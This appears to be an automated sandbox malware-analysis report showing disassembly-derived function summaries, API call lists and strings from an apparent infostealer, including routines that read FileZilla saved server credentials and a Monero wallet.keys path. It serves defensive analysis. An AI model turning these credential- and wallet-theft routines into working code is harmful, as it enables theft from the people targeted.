Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
Instruction ID: 382db567b5f28807a282c879b7125c26bc07907a3d66d836a6c9018424b660b3
Opcode Fuzzy Hash: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
Instruction Fuzzy Hash: D4F04FB1944208ABD710DF98DD4AFAEBBBCEB04711F10025AFA05A2690C77415088BA1

Function 00341160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0034116A
ExitProcess.KERNEL32 ref: 0034117E

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
Instruction ID: 12c7f7f02a108517f9236bcc2fd6dcc8033ba324cd04d8b331c8030b07bad9f4
Opcode Fuzzy Hash: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
Instruction Fuzzy Hash: 18D05E7490030CDBDB00DFE0D8496DDBBB8FB08311F001555DD05B2340EA306486DBA6

Function 00359C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013566E0), ref: 00359C2D
GetProcAddress.KERNEL32(75900000,01356780), ref: 00359C45
GetProcAddress.KERNEL32(75900000,01368F70), ref: 00359C5E
GetProcAddress.KERNEL32(75900000,01368F40), ref: 00359C76
GetProcAddress.KERNEL32(75900000,0136CDC8), ref: 00359C8E
GetProcAddress.KERNEL32(75900000,0136CB70), ref: 00359CA7
GetProcAddress.KERNEL32(75900000,0135B338), ref: 00359CBF
GetProcAddress.KERNEL32(75900000,0136CDE0), ref: 00359CD7
GetProcAddress.KERNEL32(75900000,0136CBA0), ref: 00359CF0
GetProcAddress.KERNEL32(75900000,0136CC48), ref: 00359D08
GetProcAddress.KERNEL32(75900000,0136CDF8), ref: 00359D20
GetProcAddress.KERNEL32(75900000,013567C0), ref: 00359D39
GetProcAddress.KERNEL32(75900000,01356820), ref: 00359D51
GetProcAddress.KERNEL32(75900000,01356840), ref: 00359D69
GetProcAddress.KERNEL32(75900000,01356860), ref: 00359D82
GetProcAddress.KERNEL32(75900000,0136CD20), ref: 00359D9A
GetProcAddress.KERNEL32(75900000,0136CB88), ref: 00359DB2
GetProcAddress.KERNEL32(75900000,0135B2C0), ref: 00359DCB
GetProcAddress.KERNEL32(75900000,01356940), ref: 00359DE3
GetProcAddress.KERNEL32(75900000,0136CD38), ref: 00359DFB
GetProcAddress.KERNEL32(75900000,0136CB10), ref: 00359E14
GetProcAddress.KERNEL32(75900000,0136CD50), ref: 00359E2C
GetProcAddress.KERNEL32(75900000,0136CB58), ref: 00359E44
GetProcAddress.KERNEL32(75900000,013568E0), ref: 00359E5D
GetProcAddress.KERNEL32(75900000,0136CB28), ref: 00359E75
GetProcAddress.KERNEL32(75900000,0136CD98), ref: 00359E8D
GetProcAddress.KERNEL32(75900000,0136CCA8), ref: 00359EA6
GetProcAddress.KERNEL32(75900000,0136CC60), ref: 00359EBE
GetProcAddress.KERNEL32(75900000,0136CD68), ref: 00359ED6
GetProcAddress.KERNEL32(75900000,0136CB40), ref: 00359EEF
GetProcAddress.KERNEL32(75900000,0136CD80), ref: 00359F07
GetProcAddress.KERNEL32(75900000,0136CCF0), ref: 00359F1F
GetProcAddress.KERNEL32(75900000,0136CDB0), ref: 00359F38
GetProcAddress.KERNEL32(75900000,01369F98), ref: 00359F50
GetProcAddress.KERNEL32(75900000,0136CBB8), ref: 00359F68
GetProcAddress.KERNEL32(75900000,0136CBD0), ref: 00359F81
GetProcAddress.KERNEL32(75900000,01356920), ref: 00359F99
GetProcAddress.KERNEL32(75900000,0136CC78), ref: 00359FB1
GetProcAddress.KERNEL32(75900000,01356980), ref: 00359FCA
GetProcAddress.KERNEL32(75900000,0136CCC0), ref: 00359FE2
GetProcAddress.KERNEL32(75900000,0136CCD8), ref: 00359FFA
GetProcAddress.KERNEL32(75900000,013564C0), ref: 0035A013
GetProcAddress.KERNEL32(75900000,01356400), ref: 0035A02B
LoadLibraryA.KERNEL32(0136CC90,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A03D
LoadLibraryA.KERNEL32(0136CBE8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A04E
LoadLibraryA.KERNEL32(0136CC00,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A060
LoadLibraryA.KERNEL32(0136CD08,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A072
LoadLibraryA.KERNEL32(0136CC18,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A083
LoadLibraryA.KERNEL32(0136CC30,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A095
LoadLibraryA.KERNEL32(0136CF30,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0A7
LoadLibraryA.KERNEL32(0136CF48,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0B8
GetProcAddress.KERNEL32(75FD0000,01356420), ref: 0035A0DA
GetProcAddress.KERNEL32(75FD0000,0136CE28), ref: 0035A0F2
GetProcAddress.KERNEL32(75FD0000,01368B50), ref: 0035A10A
GetProcAddress.KERNEL32(75FD0000,0136CF60), ref: 0035A123
GetProcAddress.KERNEL32(75FD0000,013563E0), ref: 0035A13B
GetProcAddress.KERNEL32(734B0000,0135B130), ref: 0035A160
GetProcAddress.KERNEL32(734B0000,01356620), ref: 0035A179
GetProcAddress.KERNEL32(734B0000,0135AF50), ref: 0035A191
GetProcAddress.KERNEL32(734B0000,0136CE10), ref: 0035A1A9
GetProcAddress.KERNEL32(734B0000,0136CE40), ref: 0035A1C2
GetProcAddress.KERNEL32(734B0000,013565C0), ref: 0035A1DA
GetProcAddress.KERNEL32(734B0000,01356460), ref: 0035A1F2
GetProcAddress.KERNEL32(734B0000,0136CFA8), ref: 0035A20B
GetProcAddress.KERNEL32(763B0000,013565E0), ref: 0035A22C
GetProcAddress.KERNEL32(763B0000,01356440), ref: 0035A244
GetProcAddress.KERNEL32(763B0000,0136CFC0), ref: 0035A25D
GetProcAddress.KERNEL32(763B0000,0136CF78), ref: 0035A275
GetProcAddress.KERNEL32(763B0000,013564A0), ref: 0035A28D
GetProcAddress.KERNEL32(750F0000,0135B180), ref: 0035A2B3
GetProcAddress.KERNEL32(750F0000,0135B2E8), ref: 0035A2CB
GetProcAddress.KERNEL32(750F0000,0136CF90), ref: 0035A2E3
GetProcAddress.KERNEL32(750F0000,01356480), ref: 0035A2FC
GetProcAddress.KERNEL32(750F0000,01356640), ref: 0035A314
GetProcAddress.KERNEL32(750F0000,0135B1A8), ref: 0035A32C
GetProcAddress.KERNEL32(75A50000,0136CF00), ref: 0035A352
GetProcAddress.KERNEL32(75A50000,01356300), ref: 0035A36A
GetProcAddress.KERNEL32(75A50000,01368A40), ref: 0035A382
GetProcAddress.KERNEL32(75A50000,0136CE58), ref: 0035A39B
GetProcAddress.KERNEL32(75A50000,0136CE70), ref: 0035A3B3
GetProcAddress.KERNEL32(75A50000,01356540), ref: 0035A3CB
GetProcAddress.KERNEL32(75A50000,01356660), ref: 0035A3E4
GetProcAddress.KERNEL32(75A50000,0136CE88), ref: 0035A3FC
GetProcAddress.KERNEL32(75A50000,0136CED0), ref: 0035A414
GetProcAddress.KERNEL32(75070000,01356280), ref: 0035A436
GetProcAddress.KERNEL32(75070000,0136CEA0), ref: 0035A44E
GetProcAddress.KERNEL32(75070000,0136CEB8), ref: 0035A466
GetProcAddress.KERNEL32(75070000,0136CEE8), ref: 0035A47F
GetProcAddress.KERNEL32(75070000,0136CF18), ref: 0035A497
GetProcAddress.KERNEL32(74E50000,01356520), ref: 0035A4B8
GetProcAddress.KERNEL32(74E50000,013562A0), ref: 0035A4D1
GetProcAddress.KERNEL32(75320000,013565A0), ref: 0035A4F2
GetProcAddress.KERNEL32(75320000,0136C888), ref: 0035A50A
GetProcAddress.KERNEL32(6F060000,013564E0), ref: 0035A530
GetProcAddress.KERNEL32(6F060000,013562C0), ref: 0035A548
GetProcAddress.KERNEL32(6F060000,013562E0), ref: 0035A560
GetProcAddress.KERNEL32(6F060000,0136C870), ref: 0035A579
GetProcAddress.KERNEL32(6F060000,01356320), ref: 0035A591
GetProcAddress.KERNEL32(6F060000,01356340), ref: 0035A5A9
GetProcAddress.KERNEL32(6F060000,01356360), ref: 0035A5C2
GetProcAddress.KERNEL32(6F060000,01356500), ref: 0035A5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0035A5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0035A607
GetProcAddress.KERNEL32(74E00000,0136CAF8), ref: 0035A629
GetProcAddress.KERNEL32(74E00000,01368A50), ref: 0035A641
GetProcAddress.KERNEL32(74E00000,0136CA98), ref: 0035A659
GetProcAddress.KERNEL32(74E00000,0136CAC8), ref: 0035A672
GetProcAddress.KERNEL32(74DF0000,01356600), ref: 0035A693
GetProcAddress.KERNEL32(6FA90000,0136CA20), ref: 0035A6B4
GetProcAddress.KERNEL32(6FA90000,01356380), ref: 0035A6CD
GetProcAddress.KERNEL32(6FA90000,0136CA38), ref: 0035A6E5
GetProcAddress.KERNEL32(6FA90000,0136C900), ref: 0035A6FD

Strings

HttpQueryInfoA, xrefs: 0035A5FC
InternetSetOptionA, xrefs: 0035A5E5

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
Instruction ID: 5f595d607e350146fb3b888d74f6efb0bef7f945ad9256e13b127d0814fd3ab6
Opcode Fuzzy Hash: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
Instruction Fuzzy Hash: 2A627DB5500200AFF748DFA8ED8896637F9F76C701304A51BAE45E3225D739A45AFF22

Function 00347710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00347724
RtlAllocateHeap.NTDLL(00000000), ref: 0034772B
lstrcat.KERNEL32(?,013694E8), ref: 003478DB
lstrcat.KERNEL32(?,?), ref: 003478EF
lstrcat.KERNEL32(?,?), ref: 00347903
lstrcat.KERNEL32(?,?), ref: 00347917
lstrcat.KERNEL32(?,0136DEB0), ref: 0034792B
lstrcat.KERNEL32(?,0136DE20), ref: 0034793F
lstrcat.KERNEL32(?,0136DE38), ref: 00347952
lstrcat.KERNEL32(?,0136DE68), ref: 00347966
lstrcat.KERNEL32(?,0136DFF8), ref: 0034797A
lstrcat.KERNEL32(?,?), ref: 0034798E
lstrcat.KERNEL32(?,?), ref: 003479A2
lstrcat.KERNEL32(?,?), ref: 003479B6
lstrcat.KERNEL32(?,0136DEB0), ref: 003479C9
lstrcat.KERNEL32(?,0136DE20), ref: 003479DD
lstrcat.KERNEL32(?,0136DE38), ref: 003479F1
lstrcat.KERNEL32(?,0136DE68), ref: 00347A04
lstrcat.KERNEL32(?,0136E060), ref: 00347A18
lstrcat.KERNEL32(?,?), ref: 00347A2C
lstrcat.KERNEL32(?,?), ref: 00347A40
lstrcat.KERNEL32(?,?), ref: 00347A54
lstrcat.KERNEL32(?,0136DEB0), ref: 00347A68
lstrcat.KERNEL32(?,0136DE20), ref: 00347A7B
lstrcat.KERNEL32(?,0136DE38), ref: 00347A8F
lstrcat.KERNEL32(?,0136DE68), ref: 00347AA3
lstrcat.KERNEL32(?,0136E0C8), ref: 00347AB6
lstrcat.KERNEL32(?,?), ref: 00347ACA
lstrcat.KERNEL32(?,?), ref: 00347ADE
lstrcat.KERNEL32(?,?), ref: 00347AF2
lstrcat.KERNEL32(?,0136DEB0), ref: 00347B06
lstrcat.KERNEL32(?,0136DE20), ref: 00347B1A
lstrcat.KERNEL32(?,0136DE38), ref: 00347B2D
lstrcat.KERNEL32(?,0136DE68), ref: 00347B41
lstrcat.KERNEL32(?,0136E130), ref: 00347B55
lstrcat.KERNEL32(?,?), ref: 00347B69
lstrcat.KERNEL32(?,?), ref: 00347B7D
lstrcat.KERNEL32(?,?), ref: 00347B91
lstrcat.KERNEL32(?,0136DEB0), ref: 00347BA4
lstrcat.KERNEL32(?,0136DE20), ref: 00347BB8
lstrcat.KERNEL32(?,0136DE38), ref: 00347BCC
lstrcat.KERNEL32(?,0136DE68), ref: 00347BDF
lstrcat.KERNEL32(?,0136E198), ref: 00347BF3
lstrcat.KERNEL32(?,?), ref: 00347C07
lstrcat.KERNEL32(?,?), ref: 00347C1B
lstrcat.KERNEL32(?,?), ref: 00347C2F
lstrcat.KERNEL32(?,0136DEB0), ref: 00347C43
lstrcat.KERNEL32(?,0136DE20), ref: 00347C56
lstrcat.KERNEL32(?,0136DE38), ref: 00347C6A
lstrcat.KERNEL32(?,0136DE68), ref: 00347C7E

Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,003617FC), ref: 00347606
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,00000000), ref: 00347648
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020, : ), ref: 0034765A
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,00000000), ref: 0034768F
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,00361804), ref: 003476A0
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,00000000), ref: 003476D3
Part of subcall function 003475D0: lstrcat.KERNEL32(35B6A020,00361808), ref: 003476ED
Part of subcall function 003475D0: task.LIBCPMTD ref: 003476FB

lstrcat.KERNEL32(?,0136E5B0), ref: 00347E0B
lstrcat.KERNEL32(?,0136D558), ref: 00347E1E
lstrlen.KERNEL32(35B6A020), ref: 00347E2B
lstrlen.KERNEL32(35B6A020), ref: 00347E3B

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: df7765f2900af81ad9a2f1201c7ae6a7041767aa055bce8f18392743525ce2b3
Instruction ID: bfbdfeb3245a1151afd003efee390ddee729d5bbbc59d19099fa1c9580ef566d
Opcode Fuzzy Hash: df7765f2900af81ad9a2f1201c7ae6a7041767aa055bce8f18392743525ce2b3
Instruction Fuzzy Hash: 73321FB2800314ABDB16EBA0DC85DEA737CBB54701F445A89F60976090EF74E78ADF61

Function 00350250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

GetProcessHeap.KERNEL32(00000000,000F423F,00360DBA,00360DB7,00360DB6,00360DB3), ref: 00350362
RtlAllocateHeap.NTDLL(00000000), ref: 00350369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00350385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003503CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 003503DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00350419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00350463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00350562
lstrcat.KERNEL32(?,profile: null), ref: 00350571
lstrcat.KERNEL32(?,url: ), ref: 00350580
lstrcat.KERNEL32(?,00000000), ref: 00350593
lstrcat.KERNEL32(?,00361678), ref: 003505A2
lstrcat.KERNEL32(?,00000000), ref: 003505B5
lstrcat.KERNEL32(?,0036167C), ref: 003505C4
lstrcat.KERNEL32(?,login: ), ref: 003505D3
lstrcat.KERNEL32(?,00000000), ref: 003505E6
lstrcat.KERNEL32(?,00361688), ref: 003505F5
lstrcat.KERNEL32(?,password: ), ref: 00350604
lstrcat.KERNEL32(?,00000000), ref: 00350617
lstrcat.KERNEL32(?,00361698), ref: 00350626
lstrcat.KERNEL32(?,0036169C), ref: 00350635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035068E

Strings

<User>, xrefs: 00350410
browser: FileZilla, xrefs: 00350559
password: , xrefs: 003505FB
url: , xrefs: 00350577
<Pass encoding="base64">, xrefs: 0035045A
login: , xrefs: 003505CA
<Port>, xrefs: 003503C6
<Host>, xrefs: 0035037C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003502A4
profile: null, xrefs: 00350568

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
